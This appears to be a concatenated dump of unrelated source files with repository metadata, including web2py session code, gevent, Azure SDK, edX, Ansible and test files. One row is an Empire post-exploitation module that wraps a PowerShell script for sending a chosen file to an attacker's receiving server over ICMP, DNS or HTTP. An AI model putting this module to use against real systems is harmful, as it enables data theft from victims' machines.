compression_level = response.session_cookie_compression_level
value = secure_dumps(dict(self),
current._session_cookie_key,
compression_level=compression_level)
rcookies = response.cookies
rcookies.pop(name, None)
rcookies[name] = to_native(value)
rcookies[name]['path'] = '/'
expires = response.session_cookie_expires
if isinstance(expires, datetime.datetime):
expires = expires.strftime(FMT)
if expires:
rcookies[name]['expires'] = expires
return True
def _unchanged(self, response):
if response.session_new:
internal = ['_last_timestamp', '_secure', '_start_timestamp', '_same_site']
for item in self.keys():
if item not in internal:
return False
return True
session_pickled = pickle.dumps(self, pickle.HIGHEST_PROTOCOL)
response.session_pickled = session_pickled
session_hash = hashlib.md5(session_pickled).hexdigest()
return response.session_hash == session_hash
def _try_store_in_db(self, request, response):
# don't save if file-based sessions,
# no session id, or session being forgotten
# or no changes to session (Unless the session is new)
if (not response.session_db_table
or self._forget
or (self._unchanged(response) and not response.session_new)):
if (not response.session_db_table
and global_settings.db_sessions is not True
and response.session_masterapp in global_settings.db_sessions):
global_settings.db_sessions.remove(response.session_masterapp)
# self.clear_session_cookies()
self.save_session_id_cookie()
return False
table = response.session_db_table
record_id = response.session_db_record_id
if response.session_new:
unique_key = web2py_uuid()
else:
unique_key = response.session_db_unique_key
session_pickled = response.session_pickled or pickle.dumps(self, pickle.HIGHEST_PROTOCOL)
dd = dict(locked=0,
client_ip=response.session_client,
modified_datetime=request.now.isoformat(),
session_data=session_pickled,
unique_key=unique_key)
if record_id:
if not table._db(table.id == record_id).update(**dd):
record_id = None
if not record_id:
record_id = table.insert(**dd)
response.session_id = '%s:%s' % (record_id, unique_key)
response.session_db_unique_key = unique_key
response.session_db_record_id = record_id
self.save_session_id_cookie()
return True
def _try_store_in_cookie_or_file(self, request, response):
if response.session_storage_type == 'file':
return self._try_store_in_file(request, response)
if response.session_storage_type == 'cookie':
return self._try_store_in_cookie(request, response)
def _try_store_in_file(self, request, response):
try:
if (not response.session_id or
not response.session_filename or
self._forget
or self._unchanged(response)):
# self.clear_session_cookies()
return False
else:
if response.session_new or not response.session_file:
# Tests if the session sub-folder exists, if not, create it
session_folder = os.path.dirname(response.session_filename)
if not os.path.exists(session_folder):
os.mkdir(session_folder)
response.session_file = recfile.open(response.session_filename, 'wb')
portalocker.lock(response.session_file, portalocker.LOCK_EX)
response.session_locked = True
if response.session_file:
session_pickled = response.session_pickled or pickle.dumps(self, pickle.HIGHEST_PROTOCOL)
response.session_file.write(session_pickled)
response.session_file.truncate()
return True
finally:
self._close(response)
self.save_session_id_cookie()
def _unlock(self, response):
if response and response.session_file and response.session_locked:
try:
portalocker.unlock(response.session_file)
response.session_locked = False
except: # this should never happen but happens in Windows
pass
def _close(self, response):
if response and response.session_file:
self._unlock(response)
try:
response.session_file.close()
del response.session_file
except:
pass
def pickle_session(s):
return Session, (dict(s),)
copyreg.pickle(Session, pickle_session)
| [
"[email protected]"
] | |
09e8055fcdcf2ad2dec55459c099ab811ed32068 | fffabb9f3025e89f7d1e71e2bea1e1f93ca95c98 | /gevent_-master/monkey_test.py | ca9512a34827effed846c0722e796fa03555f070 | [] | no_license | kagxin/recipe | 2a880b77e56bae25e9793b13a8ebdeeea19b716c | 70af9c949b9e4b476585b2b650fba416a9d3ebb2 | refs/heads/master | 2021-09-11T18:58:46.295928 | 2018-04-11T03:11:05 | 2018-04-11T03:11:05 | 86,281,134 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 129 | py | import gevent.monkey
gevent.monkey.patch_socket()
import gevent
import urllib
import json
def fetch(pid):
pass
fetch()
| [
"[email protected]"
] | |
8ada0608c934b48b2abbcdeb5aa1350a01506751 | 0a004fc3fe8e36fd7ce0ed2cc7e8140982315e03 | /supervised_learning/0x0F-word_embeddings/0-bag_of_words.py | 58f174f5ee6192922d3b2ccf12ba7882281f6654 | [] | no_license | pafuentess/holbertonschool-machine_learning | 266ed4f05e106e194cdafe39544e48904f6538f4 | 3bffd1391b3fc790f0137d0afbe90eb8e2f7d713 | refs/heads/master | 2023-03-26T15:12:14.721409 | 2021-03-20T20:28:15 | 2021-03-20T20:28:15 | 279,388,813 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 455 | py | #!/usr/bin/env python3
""" doc """
from sklearn.feature_extraction.text import CountVectorizer
def bag_of_words(sentences, vocab=None):
""" doc """
if vocab is None:
vectorizer = CountVectorizer()
X = vectorizer.fit_transform(sentences)
vocab = vectorizer.get_feature_names()
else:
vectorizer = CountVectorizer(vocabulary=vocab)
X = vectorizer.fit_transform(sentences)
return X.toarray(), vocab
| [
"[email protected]"
] | |
d132455b70c174d99968af7351962cf9ba6070a0 | f07a42f652f46106dee4749277d41c302e2b7406 | /Data Set/bug-fixing-1/30cae1c356d7341ef3c3a049b435b2da9bbd5588-<main>-bug.py | 1207a332ae96f47a64d09b9b87303bc66e73535b | [] | no_license | wsgan001/PyFPattern | e0fe06341cc5d51b3ad0fe29b84098d140ed54d1 | cc347e32745f99c0cd95e79a18ddacc4574d7faa | refs/heads/main | 2023-08-25T23:48:26.112133 | 2021-10-23T14:11:22 | 2021-10-23T14:11:22 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,799 | py |
def main():
module = AnsibleModule(argument_spec=dict(script=dict(required=True, type='str'), url=dict(required=False, type='str', default='http://localhost:8080'), validate_certs=dict(required=False, type='bool', default=True), user=dict(required=False, no_log=True, type='str', default=None), password=dict(required=False, no_log=True, type='str', default=None), timeout=dict(required=False, type='int', default=10), args=dict(required=False, type='dict', default=None)))
if (module.params['user'] is not None):
if (module.params['password'] is None):
module.fail_json(msg='password required when user provided')
module.params['url_username'] = module.params['user']
module.params['url_password'] = module.params['password']
module.params['force_basic_auth'] = True
if (module.params['args'] is not None):
from string import Template
script_contents = Template(module.params['script']).substitute(module.params['args'])
else:
script_contents = module.params['script']
headers = {
}
if is_csrf_protection_enabled(module):
crumb = get_crumb(module)
headers = {
crumb['crumbRequestField']: crumb['crumb'],
}
(resp, info) = fetch_url(module, (module.params['url'] + '/scriptText'), data=urlencode({
'script': script_contents,
}), headers=headers, method='POST', timeout=module.params['timeout'])
if (info['status'] != 200):
module.fail_json(msg=((('HTTP error ' + str(info['status'])) + ' ') + info['msg']))
result = to_native(resp.read())
if (('Exception:' in result) and ('at java.lang.Thread' in result)):
module.fail_json(msg=('script failed with stacktrace:\n ' + result))
module.exit_json(output=result)
| [
"[email protected]"
] | |
26724562ddaf5b84d3514df2553cf578c11097ff | e262e64415335060868e9f7f73ab8701e3be2f7b | /.history/pytest_test_20201123174255.py | 71d84ac3ea86d52edcf7b63ed99b1d05e2cfeaed | [] | no_license | Allison001/developer_test | 6e211f1e2bd4287ee26fd2b33baf1c6a8d80fc63 | b8e04b4b248b0c10a35e93128a5323165990052c | refs/heads/master | 2023-06-18T08:46:40.202383 | 2021-07-23T03:31:54 | 2021-07-23T03:31:54 | 322,807,303 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 254 | py | import pytest
class Test_A:
@pytest.mark.parametrize('a,b',[(10,20),(5,5)])
def test_data1(self,a,b):
print(a + b)
def test_data2(self):
a = 5
b = 5
print(a+b)
if __name__ == '__main__':
pytest.main
| [
"[email protected]"
] | |
81031853fd92e573bbec0a772457ebba3f43bb7a | e229456b9effa99e906d5cdfe08200ca5e1920a4 | /lib/modules/exfiltration/invoke-exfiltration.py | b64b4fe4bcca83a42b5941dd3559df04ae7ff47c | [
"BSD-3-Clause"
] | permissive | nerbix/Empire | cff3620f589d38a4967737458b7f4b56acabd64c | f45d5f35ff459df22ef0bd55236b7ffd9cef6f45 | refs/heads/master | 2020-05-22T09:27:59.693741 | 2017-03-08T18:18:13 | 2017-03-08T18:18:13 | 84,344,747 | 0 | 0 | null | 2017-03-08T16:54:42 | 2017-03-08T16:54:42 | null | UTF-8 | Python | false | false | 4,857 | py | from lib.common import helpers
class Module:
def __init__(self, mainMenu, params=[]):
# metadata info about the module, not modified during runtime
self.info = {
# name for the module that will appear in module menus
'Name': 'Invoke-Exfiltration',
# list of one or more authors for the module
'Author': ['Nick Britton <[email protected]>'],
# more verbose multi-line description of the module
            'Description': ('This module will exfiltrate data over a range of protocols'),
# True if the module needs to run in the background
'Background' : True,
# File extension to save the file as
'OutputExtension' : None,
# True if the module needs admin rights to run
'NeedsAdmin' : False,
# True if the method doesn't touch disk/is reasonably opsec safe
# Disabled - this can be a relatively noisy module but sometimes useful
'OpsecSafe' : False,
# The minimum PowerShell version needed for the module to run
'MinPSVersion' : '2',
# list of any references/other comments
'Comments': [
'Based heavily on the great work done by Sensepost here: http://github.com/sensepost/det'
]
}
# any options needed by the module, settable during runtime
self.options = {
# format:
# value_name : {description, required, default_value}
'Agent' : {
# The 'Agent' option is the only one that MUST be in a module
'Description' : 'Agent to generate the source traffic on',
'Required' : True,
'Value' : ''
},
'server' : {
'Description' : 'Receiving Server IP',
'Required' : True,
'Value' : ''
},
'type' : {
'Description' : 'The protocol to use (ICMP, DNS, HTTP)',
'Required' : True,
'Value' : 'ICMP'
},
'key' : {
'Description' : 'AES encryption key to use',
'Required' : True,
'Value' : 'HELLO123'
},
'file' : {
'Description' : 'Full path of file to exfiltrate',
'Required' : True,
'Value' : ''
},
'port' : {
'Description' : 'Port (for HTTP exfiltration only).',
'Required' : False,
'Value' : '8080'
},
'dns' : {
                'Description'   :   'DNS Server to use (for DNS exfiltration only).',
'Required' : False,
'Value' : 'google.com'
}
}
# save off a copy of the mainMenu object to access external functionality
# like listeners/agent handlers/etc.
self.mainMenu = mainMenu
# During instantiation, any settable option parameters
# are passed as an object set to the module and the
# options dictionary is automatically set. This is mostly
# in case options are passed on the command line
if params:
for param in params:
# parameter format is [Name, Value]
option, value = param
if option in self.options:
self.options[option]['Value'] = value
def generate(self):
# if you're reading in a large, external script that might be updates,
# use the pattern below
# read in the common module source code
moduleSource = self.mainMenu.installPath + "/data/module_source/exfil/Invoke-Exfiltration.ps1"
try:
f = open(moduleSource, 'r')
except:
print helpers.color("[!] Could not read module source path at: " + str(moduleSource))
return ""
moduleCode = f.read()
f.close()
script = moduleCode
# Need to actually run the module that has been loaded
script += 'Invoke-Exfiltration'
# add any arguments to the end execution of the script
for option,values in self.options.iteritems():
if option.lower() != "agent":
if values['Value'] and values['Value'] != '':
if values['Value'].lower() == "true":
# if we're just adding a switch
script += " -" + str(option)
else:
script += " -" + str(option) + " \"" + str(values['Value']) + "\""
return script
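        # Illustrative sketch of the command string this method builds (values
        # below are placeholders, not output from a real run):
        #   Invoke-Exfiltration -server "10.0.0.1" -type "ICMP" -key "HELLO123"
        #                       -file "C:\loot.zip" -port "8080" -dns "google.com"
        # Options whose value is the string "true" would be appended as bare switches.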
| [
"[email protected]"
] | |
afb957284892edf8fcd63b07feef00c82584970b | 4a7ca643f2bb681a14105fdfba2b696c14f8fb19 | /alphamind/tests/analysis/test_quantilieanalysis.py | fd31eaf64d67c0a4e71bef2c786c696b2e91e3ae | [
"MIT"
] | permissive | iLampard/alpha-mind | 84bb490eaa515a147b2a31deff305b2e6423c76f | c99ba7b2b082d7bf07263fde0cca57b1a8bcb7de | refs/heads/master | 2020-03-22T02:32:28.489547 | 2018-08-22T03:01:26 | 2018-08-22T03:01:26 | 126,668,894 | 0 | 0 | MIT | 2018-06-26T03:37:20 | 2018-03-25T05:53:51 | Python | UTF-8 | Python | false | false | 3,087 | py | # -*- coding: utf-8 -*-
"""
Created on 2017-8-16
@author: cheng.li
"""
import unittest
import numpy as np
import pandas as pd
from alphamind.analysis.quantileanalysis import er_quantile_analysis
from alphamind.analysis.quantileanalysis import quantile_analysis
from alphamind.data.processing import factor_processing
from alphamind.data.standardize import standardize
from alphamind.data.winsorize import winsorize_normal
from alphamind.data.quantile import quantile
class TestQuantileAnalysis(unittest.TestCase):
def setUp(self):
n = 5000
n_f = 5
        self.x = np.random.randn(n, n_f)
self.x_w = np.random.randn(n_f)
self.r = np.random.randn(n)
self.b_w = np.random.randint(0, 10, n)
self.b_w = self.b_w / float(self.b_w.sum())
self.risk_exp = np.random.randn(n, 3)
self.n_bins = 10
def test_q_anl_impl(self):
n_bins = 5
x = self.x[:, 0]
q_groups = quantile(x, n_bins)
s = pd.Series(self.r, index=q_groups)
grouped_return = s.groupby(level=0).mean().values.flatten()
expected_res = grouped_return.copy()
res = n_bins - 1
res_weight = 1. / res
for i, value in enumerate(expected_res):
expected_res[i] = (1. + res_weight) * value - res_weight * grouped_return.sum()
calculated_res = er_quantile_analysis(x, n_bins, self.r)
np.testing.assert_array_almost_equal(expected_res, calculated_res)
def test_quantile_analysis_simple(self):
f_df = pd.DataFrame(self.x)
calculated = quantile_analysis(f_df,
self.x_w,
self.r,
n_bins=self.n_bins,
do_neutralize=False,
pre_process=[],
post_process=[])
er = self.x_w @ self.x.T
expected = er_quantile_analysis(er, self.n_bins, self.r)
np.testing.assert_array_almost_equal(calculated, expected)
def test_quantile_analysis_with_factor_processing(self):
f_df = pd.DataFrame(self.x)
calculated = quantile_analysis(f_df,
self.x_w,
self.r,
n_bins=self.n_bins,
do_neutralize=True,
risk_exp=self.risk_exp,
pre_process=[winsorize_normal, standardize],
post_process=[standardize])
er = self.x_w @ factor_processing(self.x,
[winsorize_normal, standardize],
self.risk_exp,
[standardize]).T
expected = er_quantile_analysis(er, self.n_bins, self.r)
np.testing.assert_array_almost_equal(calculated, expected)
if __name__ == '__main__':
unittest.main()
| [
"[email protected]"
] | |
b2b72af5d662ec2cf1cd5c51918723e1513fc6d5 | a838d4bed14d5df5314000b41f8318c4ebe0974e | /sdk/network/azure-mgmt-network/azure/mgmt/network/v2018_11_01/aio/operations/_network_interface_ip_configurations_operations.py | 0441579f380976233a87e4c8a79c2311179a4ecd | [
"MIT",
"LicenseRef-scancode-generic-cla",
"LGPL-2.1-or-later"
] | permissive | scbedd/azure-sdk-for-python | ee7cbd6a8725ddd4a6edfde5f40a2a589808daea | cc8bdfceb23e5ae9f78323edc2a4e66e348bb17a | refs/heads/master | 2023-09-01T08:38:56.188954 | 2021-06-17T22:52:28 | 2021-06-17T22:52:28 | 159,568,218 | 2 | 0 | MIT | 2019-08-11T21:16:01 | 2018-11-28T21:34:49 | Python | UTF-8 | Python | false | false | 8,928 | py | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import Any, AsyncIterable, Callable, Dict, Generic, Optional, TypeVar
import warnings
from azure.core.async_paging import AsyncItemPaged, AsyncList
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import AsyncHttpResponse, HttpRequest
from azure.mgmt.core.exceptions import ARMErrorFormat
from ... import models as _models
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, AsyncHttpResponse], T, Dict[str, Any]], Any]]
class NetworkInterfaceIPConfigurationsOperations:
"""NetworkInterfaceIPConfigurationsOperations async operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~azure.mgmt.network.v2018_11_01.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = _models
def __init__(self, client, config, serializer, deserializer) -> None:
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
def list(
self,
resource_group_name: str,
network_interface_name: str,
**kwargs
) -> AsyncIterable["_models.NetworkInterfaceIPConfigurationListResult"]:
"""Get all ip configurations in a network interface.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param network_interface_name: The name of the network interface.
:type network_interface_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either NetworkInterfaceIPConfigurationListResult or the result of cls(response)
:rtype: ~azure.core.async_paging.AsyncItemPaged[~azure.mgmt.network.v2018_11_01.models.NetworkInterfaceIPConfigurationListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.NetworkInterfaceIPConfigurationListResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2018-11-01"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'networkInterfaceName': self._serialize.url("network_interface_name", network_interface_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize('NetworkInterfaceIPConfigurationListResult', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
list.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/networkInterfaces/{networkInterfaceName}/ipConfigurations'} # type: ignore
async def get(
self,
resource_group_name: str,
network_interface_name: str,
ip_configuration_name: str,
**kwargs
) -> "_models.NetworkInterfaceIPConfiguration":
"""Gets the specified network interface ip configuration.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param network_interface_name: The name of the network interface.
:type network_interface_name: str
:param ip_configuration_name: The name of the ip configuration name.
:type ip_configuration_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: NetworkInterfaceIPConfiguration, or the result of cls(response)
:rtype: ~azure.mgmt.network.v2018_11_01.models.NetworkInterfaceIPConfiguration
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.NetworkInterfaceIPConfiguration"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2018-11-01"
accept = "application/json"
# Construct URL
url = self.get.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'networkInterfaceName': self._serialize.url("network_interface_name", network_interface_name, 'str'),
'ipConfigurationName': self._serialize.url("ip_configuration_name", ip_configuration_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('NetworkInterfaceIPConfiguration', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/networkInterfaces/{networkInterfaceName}/ipConfigurations/{ipConfigurationName}'} # type: ignore
| [
"[email protected]"
] | |
e23182c952b026b3073f17d87b07c6f0b5a98c59 | e3ffd1f17819ab8a7b95b63f4a30cbbe85d7c44d | /week_4/contacts_short_41.py | 6a866c20b264e1243963c70d3d82ae7fb3e9efe3 | [] | no_license | jamesoneill54/programming_2 | 77d105f0eb3be7c1af3fe6ca89cf291aca4e0c95 | 8c8d7e4551894b773f52ee1e4785fe324b974ac9 | refs/heads/master | 2021-01-22T04:18:22.654154 | 2017-05-25T23:46:31 | 2017-05-25T23:46:31 | 92,451,317 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 365 | py | import sys
with open(sys.argv[1], 'r') as f:
contacts = {}
for line in f:
[name, phone] = line.strip().split()
contacts[name] = phone
for line in sys.stdin:
if line.strip() in contacts:
print('Name:', line.strip())
print('Phone:', contacts[line.strip()])
else:
print('Name:', line.strip())
print('No such contact') | [
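# Usage sketch (file names are illustrative): the contacts file holds
# "name phone" pairs, one per line; queried names arrive on stdin:
#     python3 contacts_short_41.py contacts.txt < queries.txt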
"[email protected]"
] | |
57790357a11b82f693fabb647bd204391e2a5368 | a9e3f3ad54ade49c19973707d2beb49f64490efd | /Part-03-Understanding-Software-Crafting-Your-Own-Tools/models/edx-platform/lms/djangoapps/commerce/api/v1/views.py | c85719eccde259580a7818f846c5cf0d12d2b7f5 | [
"AGPL-3.0-only",
"AGPL-3.0-or-later",
"MIT"
] | permissive | luque/better-ways-of-thinking-about-software | 8c3dda94e119f0f96edbfe5ba60ca6ec3f5f625d | 5809eaca7079a15ee56b0b7fcfea425337046c97 | refs/heads/master | 2021-11-24T15:10:09.785252 | 2021-11-22T12:14:34 | 2021-11-22T12:14:34 | 163,850,454 | 3 | 1 | MIT | 2021-11-22T12:12:31 | 2019-01-02T14:21:30 | JavaScript | UTF-8 | Python | false | false | 3,600 | py | """
Commerce views
"""
import logging
from django.contrib.auth.models import User # lint-amnesty, pylint: disable=imported-auth-user
from django.http import Http404
from edx_rest_api_client import exceptions
from edx_rest_framework_extensions.auth.jwt.authentication import JwtAuthentication
from rest_framework.authentication import SessionAuthentication
from rest_framework.generics import ListAPIView, RetrieveUpdateAPIView
from rest_framework.permissions import IsAuthenticated
from rest_framework.views import APIView
from common.djangoapps.course_modes.models import CourseMode
from common.djangoapps.util.json_request import JsonResponse
from openedx.core.djangoapps.commerce.utils import ecommerce_api_client
from openedx.core.lib.api.authentication import BearerAuthentication
from openedx.core.lib.api.mixins import PutAsCreateMixin
from ...utils import is_account_activation_requirement_disabled
from .models import Course
from .permissions import ApiKeyOrModelPermission, IsAuthenticatedOrActivationOverridden
from .serializers import CourseSerializer
log = logging.getLogger(__name__)
class CourseListView(ListAPIView):
""" List courses and modes. """
authentication_classes = (JwtAuthentication, BearerAuthentication, SessionAuthentication,)
permission_classes = (IsAuthenticated,)
serializer_class = CourseSerializer
pagination_class = None
def get_queryset(self):
return list(Course.iterator())
class CourseRetrieveUpdateView(PutAsCreateMixin, RetrieveUpdateAPIView):
""" Retrieve, update, or create courses/modes. """
lookup_field = 'id'
lookup_url_kwarg = 'course_id'
model = CourseMode
authentication_classes = (JwtAuthentication, BearerAuthentication, SessionAuthentication,)
permission_classes = (ApiKeyOrModelPermission,)
serializer_class = CourseSerializer
# Django Rest Framework v3 requires that we provide a queryset.
# Note that we're overriding `get_object()` below to return a `Course`
# rather than a CourseMode, so this isn't really used.
queryset = CourseMode.objects.all()
def get_object(self, queryset=None): # lint-amnesty, pylint: disable=arguments-differ, unused-argument
course_id = self.kwargs.get(self.lookup_url_kwarg)
course = Course.get(course_id)
if course:
return course
raise Http404
def pre_save(self, obj):
# There is nothing to pre-save. The default behavior changes the Course.id attribute from
# a CourseKey to a string, which is not desired.
pass
class OrderView(APIView):
""" Retrieve order details. """
authentication_classes = (JwtAuthentication, SessionAuthentication,)
permission_classes = (IsAuthenticatedOrActivationOverridden,)
def get(self, request, number):
""" HTTP handler. """
# If the account activation requirement is disabled for this installation, override the
# anonymous user object attached to the request with the actual user object (if it exists)
if not request.user.is_authenticated and is_account_activation_requirement_disabled():
try:
request.user = User.objects.get(id=request.session._session_cache['_auth_user_id']) # lint-amnesty, pylint: disable=protected-access
except User.DoesNotExist:
return JsonResponse(status=403)
try:
order = ecommerce_api_client(request.user).orders(number).get()
return JsonResponse(order)
except exceptions.HttpNotFoundError:
return JsonResponse(status=404)
| [
"[email protected]"
] | |
a8b587769f572f0e5f80a0878307423b27a05b90 | 28aed3120411fd7558fc08b47274f5ced5d5069c | /UIAutomation/tests/Utils/test_envsettingreader.py | c9533f87b7fe7e555380cf537766a0f96e5fc602 | [
"MIT",
"Apache-2.0"
] | permissive | SirCYong/long_long_ago | 8e181310267836774b50824e873adb7959f80080 | 6dfe9a9eb9d0f25a55bccd22b66878bde1a2fd6b | refs/heads/master | 2020-03-16T02:58:18.161981 | 2018-05-07T15:17:54 | 2018-05-07T15:17:54 | 132,477,192 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 663 | py | import unittest
from nose.tools import assert_equal
from UIAutomation.Utils import get_setting_configuration, get_env_script_runs_on
class TestEnvSettingReader(unittest.TestCase):
def test_get_setting_configuration(self):
assert_equal('Android', get_setting_configuration('android', 'platformName'))
assert_equal('.activity.base.LauncherActivity', get_setting_configuration('android', 'appActivity'))
assert_equal('com.iscs.SmallAnimal', get_setting_configuration('ios', 'bundleId'))
def test_get_env_script_runs_on(self):
assert get_env_script_runs_on().lower() == 'cit' or get_env_script_runs_on().lower() == 'sit'
| [
"[email protected]"
] | |
fd642025117c7bf558857ee67a8ba489a67f97f8 | 1ab7b3f2aa63de8488ce7c466a67d367771aa1f2 | /Ricardo_OS/Python_backend/venv/lib/python3.8/site-packages/gevent/_socket2.py | 537676c22624f54f5cdf951c1f488cd19b22b941 | [
"MIT"
] | permissive | icl-rocketry/Avionics | 9d39aeb11aba11115826fd73357b415026a7adad | 95b7a061eabd6f2b607fba79e007186030f02720 | refs/heads/master | 2022-07-30T07:54:10.642930 | 2022-07-10T12:19:10 | 2022-07-10T12:19:10 | 216,184,670 | 9 | 1 | MIT | 2022-06-27T10:17:06 | 2019-10-19T09:57:07 | C++ | UTF-8 | Python | false | false | 11,598 | py | # Copyright (c) 2009-2014 Denis Bilenko and gevent contributors. See LICENSE for details.
"""
Python 2 socket module.
"""
from __future__ import absolute_import
from __future__ import print_function
# Our import magic sadly makes this warning useless
# pylint: disable=undefined-variable
import sys
from gevent import _socketcommon
from gevent._util import copy_globals
from gevent._compat import PYPY
copy_globals(_socketcommon, globals(),
names_to_ignore=_socketcommon.__py3_imports__ + _socketcommon.__extensions__,
dunder_names_to_keep=())
__socket__ = _socketcommon.__socket__
__implements__ = _socketcommon._implements
__extensions__ = _socketcommon.__extensions__
__imports__ = [i for i in _socketcommon.__imports__ if i not in _socketcommon.__py3_imports__]
__dns__ = _socketcommon.__dns__
try:
_fileobject = __socket__._fileobject
except AttributeError:
# Allow this module to be imported under Python 3
# for building the docs
_fileobject = object
else:
# Python 2 doesn't natively support with statements on _fileobject;
# but it substantially eases our test cases if we can do the same with on both Py3
# and Py2. (For this same reason we make the socket itself a context manager.)
# Implementation copied from Python 3
assert not hasattr(_fileobject, '__enter__')
# we could either patch in place:
#_fileobject.__enter__ = lambda self: self
#_fileobject.__exit__ = lambda self, *args: self.close() if not self.closed else None
# or we could subclass. subclassing has the benefit of not
# changing the behaviour of the stdlib if we're just imported; OTOH,
# under Python 2.6/2.7, test_urllib2net.py asserts that the class IS
# socket._fileobject (sigh), so we have to work around that.
# We also make it call our custom socket closing method that disposes
# of IO watchers but not the actual socket itself.
# Python 2 relies on reference counting to close sockets, so this is all
# very ugly and fragile.
class _fileobject(_fileobject): # pylint:disable=function-redefined
__slots__ = (
'__weakref__',
)
def __enter__(self):
return self
def __exit__(self, *args):
if not self.closed:
self.close()
def close(self):
if self._sock is not None:
self._sock._drop_events_and_close(closefd=False)
super(_fileobject, self).close()
class _closedsocket(object):
__slots__ = ()
def _dummy(*args, **kwargs): # pylint:disable=no-method-argument,unused-argument
raise error(EBADF, 'Bad file descriptor')
# All _delegate_methods must also be initialized here.
send = recv = recv_into = sendto = recvfrom = recvfrom_into = _dummy
def __nonzero__(self):
return False
__bool__ = __nonzero__
if PYPY:
def _drop(self):
pass
def _reuse(self):
pass
__getattr__ = _dummy
gtype = type
_Base = _socketcommon.SocketMixin
class socket(_Base):
"""
gevent `socket.socket <https://docs.python.org/2/library/socket.html#socket-objects>`_
for Python 2.
This object should have the same API as the standard library socket linked to above. Not all
methods are specifically documented here; when they are they may point out a difference
to be aware of or may document a method the standard library does not.
.. versionchanged:: 1.5.0
This object is a context manager, returning itself, like in Python 3.
"""
# pylint:disable=too-many-public-methods
__slots__ = (
)
def __init__(self, family=AF_INET, type=SOCK_STREAM, proto=0, _sock=None):
_Base.__init__(self)
timeout = _socket.getdefaulttimeout()
if _sock is None:
self._sock = _realsocket(family, type, proto)
else:
if hasattr(_sock, '_sock'):
timeout = getattr(_sock, 'timeout', timeout)
while hasattr(_sock, '_sock'):
# passed a gevent socket or a native
# socket._socketobject. Unwrap this all the way to the
# native _socket.socket.
_sock = _sock._sock
self._sock = _sock
if PYPY:
self._sock._reuse()
self.timeout = timeout
self._sock.setblocking(0)
fileno = self._sock.fileno()
self.hub = get_hub()
io = self.hub.loop.io
self._read_event = io(fileno, 1)
self._write_event = io(fileno, 2)
def __enter__(self):
return self
def __exit__(self, t, v, tb):
self.close()
def __repr__(self):
return '<%s at %s %s>' % (type(self).__name__, hex(id(self)), self._formatinfo())
def __str__(self):
